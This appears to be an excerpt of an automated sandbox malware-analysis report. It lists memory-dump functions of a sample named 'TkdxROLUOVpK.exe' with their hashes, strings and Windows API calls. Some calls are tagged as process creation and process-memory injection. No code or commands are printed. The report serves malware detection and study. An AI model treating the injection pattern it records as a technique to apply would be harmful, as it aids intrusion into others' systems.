Opcode ID: 47286d5534887b9e4c0038efbf54abde4c29fee1f1d1039c49f18f1b904822fd
Instruction ID: 424c371392e174a7f9976974dc03440d1adb758c6b965a0527af8da7931a8223
Opcode Fuzzy Hash: 47286d5534887b9e4c0038efbf54abde4c29fee1f1d1039c49f18f1b904822fd
Instruction Fuzzy Hash: 8AA02430000D1DCFC5013774F70F0C43F5DDD001033410050F00D400005F1F1C045540

Function 07569DDB Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94dfbc60b1a5c1ae15f072f9b5c461ee5225dd83b51b1a663bc3fbf6b0f28f79
Instruction ID: f0ad927a1ad8cdd1db562c434253d53bd271264b255dfeb10b75a422424067c7
Opcode Fuzzy Hash: 94dfbc60b1a5c1ae15f072f9b5c461ee5225dd83b51b1a663bc3fbf6b0f28f79
Instruction Fuzzy Hash: C0A0023A149626EF9514279464615C53F74F9953207D05086C54049490AA1550049EA9

Function 0756861C Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42bb57639ffa0d2e1c6dce9ad45a7b5aa9861c190afc834f9f9ada073a4ce971
Instruction ID: 0d692fd7965ce97b1c968eb4f72e2ac25c54d44f0417d140de66c357ef049ad0
Opcode Fuzzy Hash: 42bb57639ffa0d2e1c6dce9ad45a7b5aa9861c190afc834f9f9ada073a4ce971
Instruction Fuzzy Hash: F9B012E5C1062480C246D674DA408042A94E642680740CE3A8024470A7C374780C2682

Non-executed Functions

Function 06AE0040 Relevance: 2.2, Strings: 1, Instructions: 911COMMON

Download Yara Rule

Strings

PHeq, xrefs: 06AE0AF6

Memory Dump Source

Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID: PHeq
API String ID: 0-2873676430
Opcode ID: 9d0927569ca6148294580632ad4750cb255ef4f14e41a556424be659de68ca74
Instruction ID: 6936524142ff5e8c503bac5b0329f48aac0e7ac2e5a6f7d3c581a6af6f21a89c
Opcode Fuzzy Hash: 9d0927569ca6148294580632ad4750cb255ef4f14e41a556424be659de68ca74
Instruction Fuzzy Hash: C9724970E00219CFCB50EFA8D984AADBBF1FF84300F1585A9D449AB255D7B0ADA5CF91

Function 07567E39 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

ax^, xrefs: 07567EEE

Memory Dump Source

Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID: ax^
API String ID: 0-994873808
Opcode ID: 12360d26e8619e25b48a59b8a529e72996cb2b0d1f2b0f599774823ac910865c
Instruction ID: 5a3022bd1220bb6b3e2ba9d901cd7730f565605826d2886f68732a97c1390800
Opcode Fuzzy Hash: 12360d26e8619e25b48a59b8a529e72996cb2b0d1f2b0f599774823ac910865c
Instruction Fuzzy Hash: A341AE75F2420A8BCB40CFA9C8898AEFBB5BB8D304F11892AD805E7350C234DD458B95

Function 07567E40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

ax^, xrefs: 07567EEE

Memory Dump Source

Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID: ax^
API String ID: 0-994873808
Opcode ID: baa9ab8ee38265c7540b6280c9c138a57bebe0916698eef3d3cde4d9067a282c
Instruction ID: b418cc9e98a7c62e8c9013734c2556e018a853697f6c6a779a9c1835663f7f0c
Opcode Fuzzy Hash: baa9ab8ee38265c7540b6280c9c138a57bebe0916698eef3d3cde4d9067a282c
Instruction Fuzzy Hash: 2441A2B5F2420A8BCB40CFA9C88989EFBF5BB8D308F15892AD405EB350C234DD458B95

Function 0476C6B8 Relevance: .4, Instructions: 366COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff43658aaf1faf164edb65601bdd9f0394fb49f392084595c0030266e0150dea
Instruction ID: 4205164bf15321bf2beafa0d29765f667bac5a16b408cba96053e72d208d31d0
Opcode Fuzzy Hash: ff43658aaf1faf164edb65601bdd9f0394fb49f392084595c0030266e0150dea
Instruction Fuzzy Hash: 45D199717017008FEB2AEB7AC454BAEB7E7AF8A704F144469C58ADB390DB35E805CB51

Function 04766420 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d83f95b2bb3a366e04aecb7f98f9b63794be9e4ae6c0673eb209e8edcde4848
Instruction ID: 6770789a18a5b51b74a9db8d0d32ca65a2628050870696ed76ef8f21ea94d4a7
Opcode Fuzzy Hash: 1d83f95b2bb3a366e04aecb7f98f9b63794be9e4ae6c0673eb209e8edcde4848
Instruction Fuzzy Hash: 85E1F674E001598FCB14DFA9C5809AEFBF2FF89304F648169D815AB35AD734A981CF60

Function 047644D8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17f8e3ea846d4224b34b5fc802e0351bc4d9fc31e8c8bb8be987e10035939887
Instruction ID: 6b351c0f9c589da3262d82e58e688727ac8ed331ccc996007029f6ac6a462666
Opcode Fuzzy Hash: 17f8e3ea846d4224b34b5fc802e0351bc4d9fc31e8c8bb8be987e10035939887
Instruction Fuzzy Hash: D8E10874E042598FCB14DFA9C5809AEFBF2FF89304F248169D815AB356D734A981CFA0

Function 04764D48 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25009d1231e550c1240a20de12f119c257d794bbff98779c8e4a57498526ccc9
Instruction ID: 2abd144b17c8095a0fee5d526fdd4c1e585d1a73a1bda1e6a10a764c36167c5b
Opcode Fuzzy Hash: 25009d1231e550c1240a20de12f119c257d794bbff98779c8e4a57498526ccc9
Instruction Fuzzy Hash: FDE1F874E041598FCB14DFA9C5809AEFBF2FF89304F248269D815AB356D734A981DFA0

Function 04764910 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abc26218772c1f6ffdb385f49402332c4d5fed018cd59df969d12d6429a359b0
Instruction ID: 8ba78da03cd3aac68e0b1c196c984b23a686a327139c978eb520d596bc53a50b
Opcode Fuzzy Hash: abc26218772c1f6ffdb385f49402332c4d5fed018cd59df969d12d6429a359b0
Instruction Fuzzy Hash: ECE1F674E042598FCB14DFA9C5809AEBBF2FF89304F24C269D815AB356D734A981CF64

Function 04765FE8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7efce1bc4f1d6062e248a4c71defdcd95082f534deb0db9b20b957d019c08185
Instruction ID: 8f1c3f9880b2e9b687f989134c829817be51970745687ef2f89d08ae464192d6
Opcode Fuzzy Hash: 7efce1bc4f1d6062e248a4c71defdcd95082f534deb0db9b20b957d019c08185
Instruction Fuzzy Hash: C3E1D774E041598FCB14DFA9C5809AEFBF2FF89304F248169D815AB35AD734A981CFA1

Function 0270D4FC Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2091609888.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2700000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a63b52e2675d79774b54392e46f2a5dbec5008ea346c3d3057326f6bdf200738
Instruction ID: 35f8deee6a97d5bca6ddfa080fd7f8cd0e60a11b1b28bcdc18919cf192cf6aa3
Opcode Fuzzy Hash: a63b52e2675d79774b54392e46f2a5dbec5008ea346c3d3057326f6bdf200738
Instruction Fuzzy Hash: 53A16D32E00215CFCF26DFA4C88459EB7F2FF85304B15856AE801AB2A1DF71E91ACB41

Function 0756CC78 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1fc63e45cc90a82e38c7f29a33a5fb63f3b13da3745f7dd4081ecb303471bcb
Instruction ID: 8d980c7094bf1e06af157890ea1bd74bc3df9f83298b80e3b966b2671333ff8b
Opcode Fuzzy Hash: c1fc63e45cc90a82e38c7f29a33a5fb63f3b13da3745f7dd4081ecb303471bcb
Instruction Fuzzy Hash: B5D10775D10B5A8ACB11EBA4D9906D9F3B2FF96300F50C79AD40937224EF706AC5CB91

Function 06AE935C Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad8cc9a57cf2274da5340566d5840fbe04527b731f3f00de40c2022bdc36f6b7
Instruction ID: 2c2c9d794891460b1093692f267d4878bbba8dc20a8b0293f7b16dec328eb24c
Opcode Fuzzy Hash: ad8cc9a57cf2274da5340566d5840fbe04527b731f3f00de40c2022bdc36f6b7
Instruction Fuzzy Hash: 78910931E102198FCB54DF69C98069DF7F1BF89314F2486AAE819EB311EB71A985CF40

Function 06AEC747 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d30616addef136eb7a252c31e247dcf45df05020e9bf254de52ecc7241523b8
Instruction ID: 201943ce3de9edcbafbb232a57be8e731b5d6f8bf625453994788abdb1412b91
Opcode Fuzzy Hash: 9d30616addef136eb7a252c31e247dcf45df05020e9bf254de52ecc7241523b8
Instruction Fuzzy Hash: 7E910B31E102198FCB54DF69C98069DF7F1BF89314F2486AAE519EB311EB71A985CF40

Function 04764900 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19acef399f67d1dede5c2ebb8e408b7369ae1903dff32df330d77ba539907f06
Instruction ID: 954713a5111a76c20a09069f51012d0de3f3241eeb35ba4fe8ed2a6ed1ecc672
Opcode Fuzzy Hash: 19acef399f67d1dede5c2ebb8e408b7369ae1903dff32df330d77ba539907f06
Instruction Fuzzy Hash: EE511874E042198FCB14CFA9C5819AEFBF2BF89304F24C16AD819A7316D7356941CFA4

Function 0756D228 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68605a211f33b5457b4ec914b0ffa0284236e157e4760d01f889ce62db9498c4
Instruction ID: 17853e58521ae6ff072965a756a3ca6109a3aed708ef280162bccf3360ff400b
Opcode Fuzzy Hash: 68605a211f33b5457b4ec914b0ffa0284236e157e4760d01f889ce62db9498c4
Instruction Fuzzy Hash: 8A4182B5B1421ADBCB049FA8C5448EEFBB7FFC9250F50496AE905EB254D632CD41CB81

Function 075672EA Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15a77186ebb19996d0e0469b48cd83f28761e45eb974469730a630da702b5ef2
Instruction ID: 8286f12d18c2c4299e65b77031a68294d4302fdc745df13fd9d3f56845d58c32
Opcode Fuzzy Hash: 15a77186ebb19996d0e0469b48cd83f28761e45eb974469730a630da702b5ef2
Instruction Fuzzy Hash: C0412671764705CFC320CB29C88999ABBF5FF89315F148C2AE45ACBA60D234E950CF51

Function 075672F8 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86c7520bd5236303ce758576b147de60de16456b18d5cbcbe4745c354c6e89d9
Instruction ID: b77a554331fd555a1beb3e298988aafff35348e03a9c851bb1547788446d1298
Opcode Fuzzy Hash: 86c7520bd5236303ce758576b147de60de16456b18d5cbcbe4745c354c6e89d9
Instruction Fuzzy Hash: CD41D371B50709CFC720CB69C88899ABBF1FF89315F148C2AD55ACBA64D234E950CF41

Function 07567D09 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5776d3334b1136a5e9ac41f436bf3571ace9efac02686f804cdb112de65f518
Instruction ID: 3abe6d419b720374bb2d1436d66adfc5a2873d6302648be2bcd1faab9df510be
Opcode Fuzzy Hash: c5776d3334b1136a5e9ac41f436bf3571ace9efac02686f804cdb112de65f518
Instruction Fuzzy Hash: 612138F2E142068BDB44CE6AC8450FFFBB6FBCA220F208D17D615E7251D6309A118BD1

Function 07567D18 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8389581c6d44df754b78ff77e731ce7a5678fcdb0a7d1d93bb8b82aa5933aac2
Instruction ID: 462daf40958f86315b46c6e3bb3e5f8db4749146df74eda3d139599a19f9424b
Opcode Fuzzy Hash: 8389581c6d44df754b78ff77e731ce7a5678fcdb0a7d1d93bb8b82aa5933aac2
Instruction Fuzzy Hash: 0B21F5F2F101068BDB84CE9AD8850FFFBB6FBCA220F208D179615E7250D63099518BD1

Function 06AE5548 Relevance: 6.4, Strings: 5, Instructions: 101COMMON

Download Yara Rule

Strings

4'eq, xrefs: 06AE55B6
4'eq, xrefs: 06AE55FC
4'eq, xrefs: 06AE561F
4'eq, xrefs: 06AE5593
4'eq, xrefs: 06AE55D9

Memory Dump Source

Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID: 4'eq$4'eq$4'eq$4'eq$4'eq
API String ID: 0-616753591
Opcode ID: d5903d6681b9d4f77b366380f8a31235e82b2722cd2bf9dfdde23a620946183d
Instruction ID: c8881aa4ad5fd6324ae02302696efb53a7b4a64e522e33a90838603c0527b581
Opcode Fuzzy Hash: d5903d6681b9d4f77b366380f8a31235e82b2722cd2bf9dfdde23a620946183d
Instruction Fuzzy Hash: F9318874B0010A9FCB49EB69E8605BEBBB7FFC1204B5084AAD5059B2A6DB316905CB91

Function 06AE5558 Relevance: 6.3, Strings: 5, Instructions: 62COMMON

Download Yara Rule

Strings

4'eq, xrefs: 06AE55B6
4'eq, xrefs: 06AE55FC
4'eq, xrefs: 06AE561F
4'eq, xrefs: 06AE5593
4'eq, xrefs: 06AE55D9

Memory Dump Source

Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd

Similarity

API ID:
String ID: 4'eq$4'eq$4'eq$4'eq$4'eq
API String ID: 0-616753591
Opcode ID: 30d91b2dd4ff3c2f791b9fe34ef5485056c784bfa2138ad79a325992f9487af5
Instruction ID: c1f96735b06eb44250f0da19c28d12c0a98b7155b43c5c9f77cf66994a739fa3
Opcode Fuzzy Hash: 30d91b2dd4ff3c2f791b9fe34ef5485056c784bfa2138ad79a325992f9487af5
Instruction Fuzzy Hash: 5F214870E0010A9FCB09EBA9D9605BEB7B7FF85300F50846AC505AB2B5EB3029458B91

Analysis Process: TkdxROLUOVpK.exePID: 2892, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	11.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	195
Total number of Limit Nodes:	10

Executed Functions

Function 012ACF71 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 150
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 012ACFFE
GetCurrentThread.KERNEL32 ref: 012AD03B
GetCurrentProcess.KERNEL32 ref: 012AD078
GetCurrentThreadId.KERNEL32 ref: 012AD0D1

Strings

4'eq, xrefs: 012ACF49

Memory Dump Source

Source File: 0000000A.00000002.2127059706.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12a0000_TkdxROLUOVpK.jbxd

Similarity

API ID: Current$ProcessThread
String ID: 4'eq
API String ID: 2063062207-1552367303
Opcode ID: ed664c7ee961e01a85f0fbdd93a0554e8565d672174f319cea0be99970b76d90
Instruction ID: 2503167a12c085768341d947201fbfedbaaeb9a25a98437043c206401255a147
Opcode Fuzzy Hash: ed664c7ee961e01a85f0fbdd93a0554e8565d672174f319cea0be99970b76d90
Instruction Fuzzy Hash: 166199B0900209CFDB15DFA9D948BDEBBF1EF89304F208459E509A7361D735A945CB61

Function 012ACF80 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 012ACFFE
GetCurrentThread.KERNEL32 ref: 012AD03B
GetCurrentProcess.KERNEL32 ref: 012AD078
GetCurrentThreadId.KERNEL32 ref: 012AD0D1

Memory Dump Source

Source File: 0000000A.00000002.2127059706.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12a0000_TkdxROLUOVpK.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 4de7b0bf45698253c61d6a285182e6b789fd27040d9336ee863be253e4616f87
Instruction ID: 0cbff0704f8927fe22d26461e66fbd9761e0d4dec286dff1f1cdb1af923db07e
Opcode Fuzzy Hash: 4de7b0bf45698253c61d6a285182e6b789fd27040d9336ee863be253e4616f87
Instruction Fuzzy Hash: 465163B09003098FEB14DFAAD948B9EBBF1EF89314F208019E509A7360D775A945CFA5

Function 04AE7113 Relevance: 1.7, APIs: 1, Instructions: 244
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04AE734E

Memory Dump Source

Source File: 0000000A.00000002.2133996557.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4ae0000_TkdxROLUOVpK.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 18cb122fc75850c1c3aef502209d40314a6b506ea468cd91a39634729eaad6b9
Instruction ID: 941c9b62c311bc310e813ccb9e6ad405a6a96ad01ba908cb8486ff8c6b114564
Opcode Fuzzy Hash: 18cb122fc75850c1c3aef502209d40314a6b506ea468cd91a39634729eaad6b9
Instruction Fuzzy Hash: 7E918C75D003199FEB10DFA9C840BEDBBB2FF48314F148569E818A7290DB74A985CF91

Function 04AE7118 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04AE734E

Memory Dump Source

Source File: 0000000A.00000002.2133996557.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4ae0000_TkdxROLUOVpK.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 2c37770f77ebaabd548b9a2ee3cafd2cad6a94b60490e4a264d4c5c7d40b1738
Instruction ID: 6ac3110423dc5c55b6a3f622fdf9a09fb6296c2e08e2af2fd2f38013ba4a5026
Opcode Fuzzy Hash: 2c37770f77ebaabd548b9a2ee3cafd2cad6a94b60490e4a264d4c5c7d40b1738
Instruction Fuzzy Hash: DF917A75D0031A9FEB10DFA9C840BEDBBB2FF48314F148569E818A7250DB75A985CF91

Function 012AACE8 Relevance: 1.7, APIs: 1, Instructions: 200
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 012AAF3E

Memory Dump Source

Source File: 0000000A.00000002.2127059706.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12a0000_TkdxROLUOVpK.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 70489e01072d0c3ff62e65e907bac58b7e92958d97871b7bcb3ea87fe9c70e0d
Instruction ID: 8bbeb2437781d7f44e1ba9bffac65c0fc09301cefd5993697169be2bfdf71440
Opcode Fuzzy Hash: 70489e01072d0c3ff62e65e907bac58b7e92958d97871b7bcb3ea87fe9c70e0d
Instruction Fuzzy Hash: EC7168B0A10B068FDB24DF29D44176ABBF5FF88300F40892DD68AD7A40D775E94ACB90

Function 012A5A64 Relevance: 1.6, APIs: 1, Instructions: 105
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.2127059706.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12a0000_TkdxROLUOVpK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baf4065bdf50afdace44e8bf4c768b77ea91212542d791c73f18c55897f6fb8a
Instruction ID: 7eec2c52eb02a38a355d0f691a8a0fef01a1bd604874ffc5cc689ba61bab4e44
Opcode Fuzzy Hash: baf4065bdf50afdace44e8bf4c768b77ea91212542d791c73f18c55897f6fb8a
Instruction Fuzzy Hash: E131E2B192434ACFDB11CFA8C8557EEBBF0EF46314F94814AC549AF252C775A90ACB81

Function 012A58ED Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 012A59A9

Memory Dump Source

Source File: 0000000A.00000002.2127059706.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12a0000_TkdxROLUOVpK.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 071af44feff5c8c79571b98fc87dd3d3192695c98a0a042630d1a0801ae3c8cd
Instruction ID: 813081f83cdf44832df97f96095f41b100cbebb00da4a5c56c06afb8a5fe1040
Opcode Fuzzy Hash: 071af44feff5c8c79571b98fc87dd3d3192695c98a0a042630d1a0801ae3c8cd
Instruction Fuzzy Hash: 2641F2B0D10719CFDB24DFA9C884BCEBBB5BF49304F20805AD508AB251DB71694ACF90

Function 012A44B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 012A59A9

Memory Dump Source

Source File: 0000000A.00000002.2127059706.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12a0000_TkdxROLUOVpK.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 07c01548fc84e58f387d9ed3dd85102bcdd99356ec519ce4bfcb760083ad1546
Instruction ID: ba8fa82256688c3f36a7304095eadd1040e363c61a5f55c933e1af53da83ea44
Opcode Fuzzy Hash: 07c01548fc84e58f387d9ed3dd85102bcdd99356ec519ce4bfcb760083ad1546
Instruction Fuzzy Hash: 6E41F1B0D10719CBDB24CFAAC844BCEBBF5BF49304F60806AD508AB251DB71694ACF90

Function 04AE6E8B Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04AE6F20

Memory Dump Source

Source File: 0000000A.00000002.2133996557.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4ae0000_TkdxROLUOVpK.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 2922c31759c33fefa6a746753393d09eb5258c52f6a49b05b029ad12688c231b
Instruction ID: 4333dbc1c63e29028e711b69af86daa07a376cff9b2ebcd40677954094dd0d72
Opcode Fuzzy Hash: 2922c31759c33fefa6a746753393d09eb5258c52f6a49b05b029ad12688c231b
Instruction Fuzzy Hash: 872146B6D003498FCB10CFA9C9817EEBBF4FF48310F14882AE918A7241C7789944DBA0

Function 04AE6E90 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04AE6F20

Memory Dump Source

Source File: 0000000A.00000002.2133996557.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_4ae0000_TkdxROLUOVpK.jbxd

